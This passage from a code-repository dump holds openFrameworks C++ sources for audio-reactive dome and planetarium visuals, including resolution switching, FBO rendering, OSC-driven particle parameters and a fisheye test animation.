fboParticles.clear();\n fboParticles.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboSphere.clear();\n fboSphere.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n }\n break;\n case '2':\n if(renderer.getOutputResolution()!= r512){\n renderer.setOutputResolution(r512);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n \n fw = renderer.getFboWidth();\n fh = renderer.getFboHeight();\n \n fboPost.clear();\n fboPost.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboInstanced.clear();\n fboInstanced.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n 
fboParticles.clear();\n fboParticles.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboSphere.clear();\n fboSphere.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n }\n break;\n case '3':\n if(renderer.getOutputResolution()!= r1024){\n renderer.setOutputResolution(r1024);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n \n fw = renderer.getFboWidth();\n fh = renderer.getFboHeight();\n \n fboPost.clear();\n fboPost.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n \n fboInstanced.clear();\n fboInstanced.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboParticles.clear();\n fboParticles.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboSphere.clear();\n fboSphere.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n }\n break;\n case '4':\n if(renderer.getOutputResolution()!= r2048){\n renderer.setOutputResolution(r2048);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n \n fw = renderer.getFboWidth();\n fh = renderer.getFboHeight();\n \n fboPost.clear();\n fboPost.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboInstanced.clear();\n fboInstanced.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboParticles.clear();\n fboParticles.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboSphere.clear();\n fboSphere.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n }\n break;\n case '5':\n if(renderer.getOutputResolution()!= r4096){\n renderer.setOutputResolution(r4096);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n \n fw = renderer.getFboWidth();\n fh = renderer.getFboHeight();\n \n fboPost.clear();\n fboPost.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboInstanced.clear();\n fboInstanced.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboParticles.clear();\n fboParticles.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n \n fboSphere.clear();\n fboSphere.allocate(renderer.getFboWidth(), renderer.getFboHeight(), GL_RGBA);\n\n }\n break;\n \n //change recording mode---------------\n case 'p':\n if(renderer.getRecordingMode()!=PNG_SEQUENCE) renderer.setRecordingMode(PNG_SEQUENCE);\n break;\n case 'm':\n if(renderer.getRecordingMode()!=MOV_FILE) renderer.setRecordingMode(MOV_FILE);\n break;\n \n default:\n break;\n }\n \n}\n#pragma mark - Fbo draw funcs\n//--------------------------------------------------------------\nvoid ofApp::drawDomeLimits(int w, int h){\n \n \n //ofBackground(255);\n int x = w*0.5;\n int y = h*0.5;\n int rad = w*0.5;\n \n ofPushStyle();\n ofSetCircleResolution(30);\n ofNoFill();\n //full\n ofSetColor(ofColor::red);\n ofDrawCircle(x,y,rad);\n// //mid\n// ofSetColor(ofColor::orange);\n// ofDrawCircle(x,y,rad*0.66);\n// //small\n// ofSetColor(ofColor::yellow);\n// 
ofDrawCircle(x,y,rad*0.33);\n \n \n ofPopStyle();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboPost(){\n\n fboPost.begin();\n ofClear(0,0,0,1);\n \n ofDisableAlphaBlending();\n \n postManager.begin();\n drawFbo.draw(0,0);\n postManager.end();\n \n fboPost.end();\n \n ofEnableAlphaBlending();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboMain(){\n \n drawFbo.begin();\n \n\n ofClear(0, 0, 0, 0);\n\n if(gDoDrawParts) fboParticles.draw(0,0);\n \n if(gDoDrawInstanced)fboInstanced.draw(0,0);\n \n if(gDoDrawSphere) fboSphere.draw(0,0);\n \n if(gDoDrawDomeLimits) drawDomeLimits(fw, fh);\n \n drawFbo.end();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboInstanced(){\n \n \n ofEnableAlphaBlending();\n \n fboInstanced.begin();\n ofClear(255,255,255, 0);\n //----------------------------\n if(gUseLight){\n ofEnableLighting();\n light.enable();\n }\n \n cam.begin();\n \n //??? hacen falta estos guachines?\n ofEnableDepthTest();\n ofDisableAlphaBlending();\n //-----------------------\n \n instanced.drawScene();\n \n \n ofDisableDepthTest();//??? hace falta?\n \n cam.end();\n \n if(gUseLight){\n light.disable();\n ofDisableLighting();\n }\n //----------------------------\n fboInstanced.end();\n \n \n \n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboParticles(){\n\n fboParticles.begin();\n ofClear(255,255,255, 0);\n //----------------------------\n if(gUseLight){\n ofEnableLighting();\n light.enable();\n }\n\n if(gUseCam)cam.begin();\n\n \n ofEnableDepthTest();\n ofEnableAlphaBlending();\n \n ///DRAW pair\n pair.drawScene();\n \n \n if(gUseCam)cam.end();\n \n if(gUseLight){\n light.disable();\n ofDisableLighting();\n }\n \n ofDisableDepthTest();\n //----------------------------\n fboParticles.end();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboSphere(){\n \n fboSphere.begin();\n ofClear(255,255,255, 0);\n //----------------------------\n \n \n ofEnableDepthTest();\n \n \n if(gUseLight){\n ofEnableLighting();\n light.enable();\n }\n\n cam.begin();\n \n\n ///drawSphere---------\n sphere.drawScene();\n ///---------\n \n \n \n if(gUseLight){\n light.disable();\n ofDisableLighting();\n }\n \n cam.end();\n \n ofDisableDepthTest();\n \n //----------------------------\n fboSphere.end();\n\n}\n#pragma mark - Updates\n//--------------------------------------------------------------\nvoid ofApp::updatePair(){\n \n int w = fw;\n \n guiPair.update();\n \n std::map<string, float> oscData;\n \n \n oscData[KEY_DIST_TRESHOLD] = guiPair.gDistTreshold;///osc\n oscData[KEY_PARTS_NUM] = guiPair.gPartsNum;\n oscData[KEY_X_VELOCITY] = guiPair.gXvelocity;///osc\n //oscData[KEY_RADIUS_INIT] = guiPair.gRadiusInit;\n oscData[KEY_RADIUS_INIT] = 0.009 * w;\n oscData[KEY_RADIUS_VAR] = guiPair.gRadiusVar;///osc\n oscData[KEY_ANGLE_INIT] = guiPair.gAngleInit;\n oscData[KEY_ANGLE_VAR] = guiPair.gAngleVar;///osc\n //nz\n oscData[KEY_ANGLE_NZ_AMP] = guiPair.gNzAngleAmp;///osc\n oscData[KEY_ANGLE_NZ_FREQ] = guiPair.gNzAngleFreq;\n// oscData[KEY_RADIUS_NZ_AMP] = guiPair.gNzRadAmp;///osc\n oscData[KEY_RADIUS_NZ_AMP] = 0.002 * w;///osc\n oscData[KEY_RADIUS_NZ_FREQ]= guiPair.gNzRadFreq;\n oscData[KEY_X_NZ_AMP] = guiPair.gNzXposAmp;///osc\n oscData[KEY_X_NZ_FREQ] = guiPair.gNzXposFreq;\n oscData[KEY_PART_SIZE] = 10; ///osc\n \n if(gReceiveOSC){\n \n //oscData[KEY_DIST_TRESHOLD] = guiPair.gDistTreshold * oscCentroid * oscCentroid;\n 
//oscData[KEY_DIST_TRESHOLD] = 460 * oscCentroid * oscCentroid;\n if(oscHfc>0.5){\n oscData[KEY_DIST_TRESHOLD] = w * oscHfc;\n }\n \n// oscData[KEY_RADIUS_VAR] = guiPair.gRadiusVar * oscCentroid;\n oscData[KEY_RADIUS_VAR] = 0.2*w * oscCentroid;\n \n oscData[KEY_ANGLE_VAR] = 0.025 * oscSpecComp * oscSpecComp ;\n //oscData[KEY_ANGLE_VAR] = 0.132 * oscSpecComp * oscSpecComp ;\n \n// oscData[KEY_X_NZ_AMP] = guiPair.gNzXposAmp;\n oscData[KEY_X_NZ_AMP] = 0.38 * w;\n \n// oscData[KEY_X_VELOCITY] = guiPair.gXvelocity*0.5 + guiPair.gXvelocity*oscCentroid;\n oscData[KEY_X_VELOCITY] = 0.8*w *0.5 + 0.8*w *oscCentroid;\n \n oscData[KEY_PART_SIZE] = 0.004*w + oscPower*0.004*w;\n }\n\n std::map<string, float> pairData_A = oscData;\n std::map<string, float> pairData_B = oscData;\n \n\n// pair.setDistanceTreshold(guiPair.gDistTreshol/d * oscPower * oscPower * 5);///fixme\n pair.setDistanceTreshold(0.07*w * oscPower * oscPower * 5);\n \n pair.update(pairData_A, pairData_B);\n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::updateSphere(){\n \n //---------------------------------\n float x, y, vol, rad, res, vel;\n \n float val1 = oscCentroid;\n float val2 = oscSpecComp;\n \n x = oscCentroid * sphere.xGui;\n y = .001 + oscSpecComp * sphere.yGui;\n vol = 0.25 + oscPower * sphere.volumeGui;\n rad = 10 + oscSpecComp * sphere.radiusGui;\n res = sphere.dispResolution;\n vel = 1;\n \n sphere.dispNzAmnt = sphere.strengthGui;\n \n //sphere.displacement.update(sphere.xGui, sphere.yGui, sphere.volumeGui, sphere.radiusGui, sphere.resolGui, ofGetFrameNum()*sphere.velGui);\n sphere.displacement.update(x, y, vol, rad, sphere.resolGui, ofGetFrameNum()*sphere.velGui);\n \n}\n//--------------------------------------------------------------\nvoid ofApp::updateInstanced(){\n \n int w = fw;\n \n //update instancedManager values\n if(!instanced.gMode)instanced.setMode(LINEAL);\n else if(instanced.gMode && !instanced.gRadMode) instanced.setMode(RAD_CONCENTRIC);\n else if(instanced.gMode && instanced.gRadMode){\n instanced.setMode(RAD_CENTRIFUGE);\n instanced.setRadDeform(instanced.gRadDeform);\n }\n \n instanced.setWidth(instanced.gWidth);\n instanced.setHeight(instanced.gHeight);\n instanced.setCubeSize(instanced.gCubesizeUnified * MAX_CUBESIZE*w);\n \n instanced.setMaskRadius(instanced.gMaskRadius);///osc\n \n instanced.setHres(instanced.gHres * MAX_H_RES);\n instanced.setVres(instanced.gVres * MAX_V_RES);\n \n instanced.setVelocity(instanced.gVelocity * MAX_VELOCITY);///osc\n \n instanced.setXpos(instanced.gXpos);\n instanced.setYpos(instanced.gYpos);\n instanced.setZpos(instanced.gZpos);\n //nz\n instanced.setNzTime(instanced.gNzTime * MAX_NZ_TIME);\n \n instanced.setXnzAmp(instanced.gNzXAmp * MAX_NZ_AMP*w);///osc\n instanced.setXnzFreq(instanced.gNzXFreq * MAX_NZ_FREQ);\n instanced.setXnzRug(instanced.gNzXRug * MAX_NZ_RUG*w);\n \n instanced.setYnzAmp(instanced.gNzYAmp * MAX_NZ_AMP*w);\n instanced.setYnzFreq(instanced.gNzYFreq * MAX_NZ_FREQ);\n instanced.setYnzRug(instanced.gNzYRug * MAX_NZ_RUG*w);\n \n instanced.setZnzAmp(instanced.gNzZAmp * MAX_NZ_AMP*w);///osc\n instanced.setZnzFreq(instanced.gNzZFreq * MAX_NZ_FREQ);\n instanced.setZnzRug(instanced.gNzZRug * MAX_NZ_RUG*w);\n \n if(gReceiveOSC){\n// instanced.setVelocity(oscPower * oscPower * 0.7 * MAX_VELOCITY);//10\n instanced.setVelocity(oscPower * oscPower * 0.7 * MAX_VELOCITY);//10\n \n instanced.setZnzAmp(oscCentroid*oscCentroid * 6 * MAX_NZ_AMP*w);\n \n// instanced.setZnzAmp(oscCentroid * instanced.gNzZAmp*3 * MAX_NZ_AMP*w);\n \n 
instanced.setXnzAmp(oscSpecComp * oscSpecComp * MAX_NZ_AMP*w);\n \n if(isReallyOnset)instanced.setMaskRadius(0.0);\n else instanced.setMaskRadius(0.5 - oscTLtrack*0.5);\n \n \n }\n\n\n}\n\n#pragma mark - Other funcs\n//--------------------------------------------------------------\nvoid ofApp::setupGui(){\n \n //-----------------------------------\n guiMain.setup(\"Main Panel\");\n guiMain.setPosition(0, 0);\n guiMain.add(gDoPostProcessing.setup(\"Post-Proc\", true));\n guiMain.add(gReceiveOSC.setup(\"Receive Osc\", true));\n guiMain.add(gDoDrawInstanced.setup(\"Draw Inst\", true));\n guiMain.add(gDoDrawSphere.setup(\"Draw Sphere\", false));\n guiMain.add(gDoDrawParts.setup(\"Draw Parts\", true));\n guiMain.add(gDoDrawDomeLimits.setup(\"Draw Dome Lim\", true));\n guiMain.add(gLightPos.setup(\"LighPos\", ofVec3f(0.5), ofVec3f(0.0), ofVec3f(0.5)));\n guiMain.add(gUseCam.setup(\"useCam\", true));\n guiMain.add(gAxis.setup(\"axis\", true));\n guiMain.add(gUseLight.setup(\"useLight\", true));\n guiMain.add(gFisheye.setup(\"fisheye\", 0.6, 0.0, 1.0));\n\n \n //--------------------------\n //??? mandarlo al particleSystemPair?\n guiPair.setup();\n guiPair.gui.setPosition(200, 0);\n\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::resetCamera(){\n \n cam.setPosition(ofVec3f(fw*0.5, fh*0.5, 500.0));\n cam.lookAt(ofVec3f( fw*0.5, fh*0.5, 0.0));\n cam.setTarget(ofVec3f( fw*0.5, fh*0.5, 0.0));\n\n}\n//--------------------------------------------------------------\nvoid ofApp::triggerOnset(){\n \n pair.addPartGroup(1);\n pair.addPartGroup(2);\n\n}\n//--------------------------------------------------------------\nvoid ofApp::updateOscFromDataFile(int frameNum){\n \n string frameNumStr = ofToString(frameNum);\n \n oscPower = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:POWER\",0.0);\n \n oscFreq = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:PITCHFREQ\", 0.0);\n \n oscConfidence = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:PITCHCONF\", 0.0);\n \n oscSalience = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:SALIENCE\", 0.0);\n \n oscHfc = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:HFC\", 0.0);\n \n oscCentroid = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:CENTROID\", 0.0);\n \n oscSpecComp = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:SPECCOMP\", 0.0);\n \n oscInharm = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:INHARM\", 0.0);\n \n oscOnset = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:ONSET\", 0.0);\n \n oscTLtrack = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":TIMELINE:TL-default\", 0.0);\n \n}\n//--------------------------------------------------------------\nvoid ofApp::receiveOsc(){\n \n \n // check for waiting messages\n while(receiver.hasWaitingMessages()){\n // get the next message\n ofxOscMessage m;\n receiver.getNextMessage(&m);\n \n if(m.getAddress()==\"/ch0\"){\n oscPower = m.getArgAsFloat(0);\n oscFreq = m.getArgAsFloat(1);\n oscConfidence = m.getArgAsFloat(2);\n oscSalience = m.getArgAsFloat(3);\n oscHfc = m.getArgAsFloat(4);\n oscCentroid = m.getArgAsFloat(5);\n oscSpecComp = m.getArgAsFloat(6);\n oscInharm = m.getArgAsFloat(7);\n oscOnset = m.getArgAsInt32(8);\n }\n else if(m.getAddress()==\"/TL-default\"){\n oscTLtrack = m.getArgAsFloat(0);\n }\n\n 
}\n\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::startAnimation(){\n    isAnimating=true;\n    ofLogNotice(\"Animation STARTED\");\n}\n//--------------------------------------------------------------\nvoid ofApp::stopAnimation(){\n    frameCounter = -1;\n    lastFrameWithOnset = 0;\n    isAnimating = false;\n    ofLogNotice(\"Animation STOPPED\");\n}\n\n" }, { "alpha_fraction": 0.6258412003517151, "alphanum_fraction": 0.6271870732307434, "avg_line_length": 17.121952056884766, "blob_id": "4c452450a9030505ceba874055543c1e971456ab", "content_id": "88b5ae444b636506ca49048cf00e5020cdf61c95", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 743, "license_type": "permissive", "max_line_length": 54, "num_lines": 41, "path": "/Graphics/addons/ofxDomemaster/src/ofxDomemaster.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n\nclass ofxDomemaster{\n\n\tpublic:\n\t\tstatic const int renderCount = 5;\n        ofxDomemaster();\n\t\tvoid setup();\n\t\tvoid draw();\n\t\tvoid drawMask();\n        void begin(int i);\n        void end(int i);\n        void resize(int w, int h);\n        void setCameraPosition(float x, float y, float z);\n        void setMeshScale(float s);\n\t\tint width;\n        int height;\n\n    private:\n        ofRectangle view;\n        vector<ofCamera> renderCamera;\n        vector<ofFbo> renderFbo;\n        vector<ofVboMesh> renderMesh;\n        ofCamera fisheyeCamera;\n        ofRectangle fisheyeView;\n        ofImage mask;\n\n        float meshScale;\n        float meshScaleExt;\n        ofNode cameraNode;\n        enum positions{\n            bottom,\n            front,\n            left,\n            right,\n            top\n        };\n\n};\n" }, { "alpha_fraction": 0.6690544486045837, "alphanum_fraction": 0.6776504516601562, "avg_line_length": 18.94285774230957, "blob_id": "ff8edd358aac982fd9a0ca2c5bb14cf3b0259d6c", "content_id": "9335558d00361b3262e7ba97e78e3fcc3cc06c33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 698, "license_type": "no_license", "max_line_length": 68, "num_lines": 35, "path": "/Graphics/apps/videoTest_3/src/ImageSaverThread.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "/*\n * ImageSaverThread.h\n *\n *  Created on: Oct 14, 2014\n *      Author: arturo\n */\n#pragma once\n#include \"ofMain.h\"\nclass ImageSaverThread: public ofThread{\npublic:\n\tImageSaverThread();\n\t~ImageSaverThread();\n\n\tvoid save(unsigned char * pixels);\n\tvoid waitReady();\n\tvoid threadedFunction();\n    \n    void setImageSize(int w, int h){\n        width = w;\n        heigth = h;\n    };\n    void setLastFrameMarker(int frameNum){lastFrameMarker=frameNum;}\n    int getlastFrameMarker(){return lastFrameMarker;}\n\nprivate:\n\tofPixels pixels;\n\tofThreadChannel<unsigned char *> channel;\n\tofThreadChannel<bool> channelReady;\n\tbool firstFrame;\n    \n    int width;\n    int heigth;\n    int lastFrameMarker;\n    \n};\n" }, { "alpha_fraction": 0.47603639960289, "alphanum_fraction": 0.5008088946342468, "avg_line_length": 29.060791015625, "blob_id": "251d8afda31a2c5f0afbb6da1a3273f818cc0316", "content_id": "4e834879992527b2bf06fc3b3404f56bb3e696c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9890, "license_type": "no_license", "max_line_length": 105, "num_lines": 329, "path": "/Graphics/apps/videoTest_BA_Planetarium/src/ofApp.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofApp.h\"\n\n//--------------------------------------------------------------\nvoid ofApp::setup(){\n\n    
ofSetBackgroundColor(50);\n    ofSetFrameRate(FRAME_RATE);\n\n    frameDuration = 1.0 / FRAME_RATE;\n    framesMaxNumber = DURATION * FRAME_RATE;\n    frameCounter = 0;\n    isAnimating = false;\n\n    fisheye.setup(tVariableFisheye);\n    fisheyeAmount = 0.0;\n\n    renderer.setup(FRAME_RATE, PNG_SEQUENCE, r1024);\n\n    drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n\n    verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n\n    ofSetCircleResolution(60);\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::update(){\n\n    //display frame rate as window title\n    ofSetWindowTitle(ofToString(ofGetFrameRate()));\n\n    //animation data update\n    if(isAnimating){\n        frameCounter++;\n        animationTime = frameCounter * frameDuration;\n        animValue = animationTime/DURATION;\n\n        //end recording and animation at 15\"\n        if (frameCounter>=framesMaxNumber){\n            stopAnimation();\n            renderer.stopRecording();\n        }\n    }\n    //-----------------------------------\n\n    int rw = renderer.getFboWidth();\n    int rh = renderer.getFboHeight();\n\n    //draw openGL scene in drawFbo\n    drawFbo.begin();\n    ofClear(0);\n    drawScene(rw, rh);\n    drawFbo.end();\n\n    //draw drawFbo into Renderer's FBO with Fisheye FX\n    fisheyeAmount = animValue * 0.35 + 0.5; //animated from 0.5 to 0.85\n    renderer.getFbo()->begin();\n    ofClear(0);\n    fisheye.begin(drawFbo.getTexture(), rw, rh, fisheyeAmount);\n    glBegin(GL_QUADS);\n    glTexCoord2f(0, 0); glVertex3f(0, 0, 0);\n    glTexCoord2f(rw, 0); glVertex3f(rw, 0, 0);\n    glTexCoord2f(rw, rh); glVertex3f(rw, rh, 0);\n    glTexCoord2f(0,rh); glVertex3f(0, rh, 0);\n    glEnd();\n    fisheye.end();\n    renderer.getFbo()->end();\n\n    //Record Renderer's FBO into a .mov file or png sequence\n    renderer.update();\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::draw(){\n\n    //Scaled Renderer's FBO preview----------\n    renderer.draw(250, 0, 512, 512);\n\n    //Recording indicator-------------------\n    if(renderer.getIsRecording()){\n        ofPushStyle();\n        ofPushMatrix();\n        ofTranslate(ofGetWidth() - 60, 60);\n        ofSetColor(255, 0, 0);\n        ofDrawCircle(0,0, 40);\n        ofSetColor(ofColor::white);\n        ofDrawBitmapString(\"REC\", -10, 0);\n        ofPopMatrix();\n        ofPopStyle();\n    }\n\n    //Display Key commands-----------------\n    ofPushStyle();\n    string keys = \"KEY COMMANDS:\";\n    keys += \"\\nSpacebar: START/STOP Animation\"\n    \"\\nr: START/STOP Recording & Animation\"\n    \"\\np: PNG sequence\"\n    \"\\nm: MOV-H264 file\"\n    \"\\n1: 256x256\"\n    \"\\n2: 512x512\"\n    \"\\n3: 1024x1024\"\n    \"\\n4: 2048x2048\"\n    \"\\n5: 4096x4096\";\n    ofSetColor(ofColor::white);\n    ofDrawBitmapString(keys, 10, 20);\n    ofPopStyle();\n\n    //Display Info-----------------\n    ofPushStyle();\n    string info = \"INFO: \";\n    info += \"\\nfps: \"+ofToString(ofGetFrameRate())\n    + \"\\nFBO output res: \" + renderer.getResolutionAsString()\n    + \"\\nREC mode: \" + renderer.getRecordingModeAsString();\n    if(renderer.getIsRecording()){\n        info += \"\\nRECORDING FRAME NUM: \" + ofToString(ofGetFrameNum() - renderer.getLastFrameMarker());\n    }\n    ofSetColor(ofColor::yellow);\n    ofDrawBitmapString(info, 10, ofGetHeight()-100);\n    ofPopStyle();\n\n\n\n}\n//--------------------------------------------------------------\nvoid ofApp::exit(){\n    renderer.exit();\n}\n//--------------------------------------------------------------\nvoid ofApp::keyPressed(int key){\n\n    switch (key) {\n        //start-stop Animation--------------------\n        case ' ':\n            if(!isAnimating)startAnimation();\n            else stopAnimation();\n            break;\n        //start-stop Animation & 
Recording---------------\n case 'r':\n if(!renderer.getIsRecording())renderer.startRecording();\n else renderer.stopRecording();\n\n if(!isAnimating)startAnimation();\n else stopAnimation();\n break;\n //change resolution-----------------------------\n case '1':\n if(renderer.getOutputResolution()!= r256){\n renderer.setOutputResolution(r256);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n }\n break;\n case '2':\n if(renderer.getOutputResolution()!= r512){\n renderer.setOutputResolution(r512);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n }\n break;\n case '3':\n if(renderer.getOutputResolution()!= r1024){\n renderer.setOutputResolution(r1024);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n }\n break;\n case '4':\n if(renderer.getOutputResolution()!= r2048){\n renderer.setOutputResolution(r2048);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n }\n break;\n case '5':\n if(renderer.getOutputResolution()!= r4096){\n renderer.setOutputResolution(r4096);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n }\n break;\n\n //change recording mode---------------\n case 'p':\n if(renderer.getRecordingMode()!=PNG_SEQUENCE) renderer.setRecordingMode(PNG_SEQUENCE);\n break;\n case 'm':\n if(renderer.getRecordingMode()!=MOV_FILE) renderer.setRecordingMode(MOV_FILE);\n break;\n\n default:\n break;\n }\n}\n//--------------------------------------------------------------\nvoid ofApp::drawScene(int w, int h){\n\n //LINEAR MOTION------------\n ofPushStyle();\n ofFill();\n //left to right moving circle\n ofSetColor(ofColor::red);\n ofDrawCircle(animValue*w, h*.5, w*0.05);\n //top to bottom moving circle\n ofSetColor(ofColor::violet);\n ofDrawCircle(w*.5, animValue*h, w*0.05);\n ofPopStyle();\n\n //CONCENTRIC MOTION------------------\n int circlesNum = 5;\n float speed = 2;\n ofSetRectMode(OF_RECTMODE_CENTER);\n ofPushStyle();\n ofPushMatrix();\n ofTranslate(w*.5, h*.5);\n ofNoFill();\n ofSetColor(ofColor::white);\n ofSetLineWidth(w*0.002);\n for (int i=0; i<circlesNum; i++) {\n float v = animValue + (1/(float)circlesNum) * i ;\n if(v>1.0) v-= 1.0;\n int rad = (int)(v * speed * (h*.5)) % (int)(w*.5) ;\n //ofDrawCircle(0, 0, rad);\n ofDrawRectangle(0, 0, rad*2, rad*2);\n }\n ofPopMatrix();\n ofPopStyle();\n\n //ROTATION----------------------\n int linesNum = 8;\n ofPushStyle();\n ofPushMatrix();\n ofTranslate(w*.5, h*.5);\n ofRotate(animValue*360);\n ofSetColor(ofColor::green);\n ofSetLineWidth( w*0.003);\n for (int i=0; i<linesNum; i++) {\n float angle = ofDegToRad((360/(float)linesNum) * i);\n float radius = w*.5;\n float x = radius * cos(angle);\n float y = radius * sin(angle);\n ofDrawLine(0, 0, x, y);\n }\n ofPopMatrix();\n ofPopStyle();\n\n //DOME CIRCLE PROJECTION LIMIT DISPLAY-----------------\n ofPushStyle();\n ofSetColor(ofColor::red);\n ofNoFill();\n ofSetLineWidth( w*0.004);\n ofDrawCircle(w*.5, h*.5, w*.5);\n ofPopStyle();\n\n //INFO DISPLAY--------------------------------\n ofPushStyle();\n 
ofSetColor(ofColor::yellow);\n    string sceneInfo = \"Time: \" + ofToString(animationTime, 2)\n    + \"\\nFisheye: \" + ofToString(fisheyeAmount, 2);\n    verdana.drawString(sceneInfo, w*.35, h*.4);\n    ofPopStyle();\n}\n\n//--------------------------------------------------------------\nvoid ofApp::startAnimation(){\n    isAnimating=true;\n    ofLogNotice(\"Animation STARTED\");\n}\n//--------------------------------------------------------------\nvoid ofApp::stopAnimation(){\n    frameCounter = 0;\n    isAnimating = false;\n    ofLogNotice(\"Animation STOPPED\");\n}\n//--------------------------------------------------------------\nvoid ofApp::keyReleased(int key){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseMoved(int x, int y ){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseDragged(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mousePressed(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseReleased(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseEntered(int x, int y){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseExited(int x, int y){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::windowResized(int w, int h){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::gotMessage(ofMessage msg){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::dragEvent(ofDragInfo dragInfo){\n\n}\n" }, { "alpha_fraction": 0.5719547271728516, "alphanum_fraction": 0.5964474081993103, "avg_line_length": 26.943262100219727, "blob_id": "56b69db855d3f0e11839ac155adec911fd565164", "content_id": "136115a200226603d713121502e4479b016faaf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3603, "license_type": "no_license", "max_line_length": 105, "num_lines": 130, "path": "/Graphics/apps/videoTest_2/src/instancedManager.cpp", "repo_name": 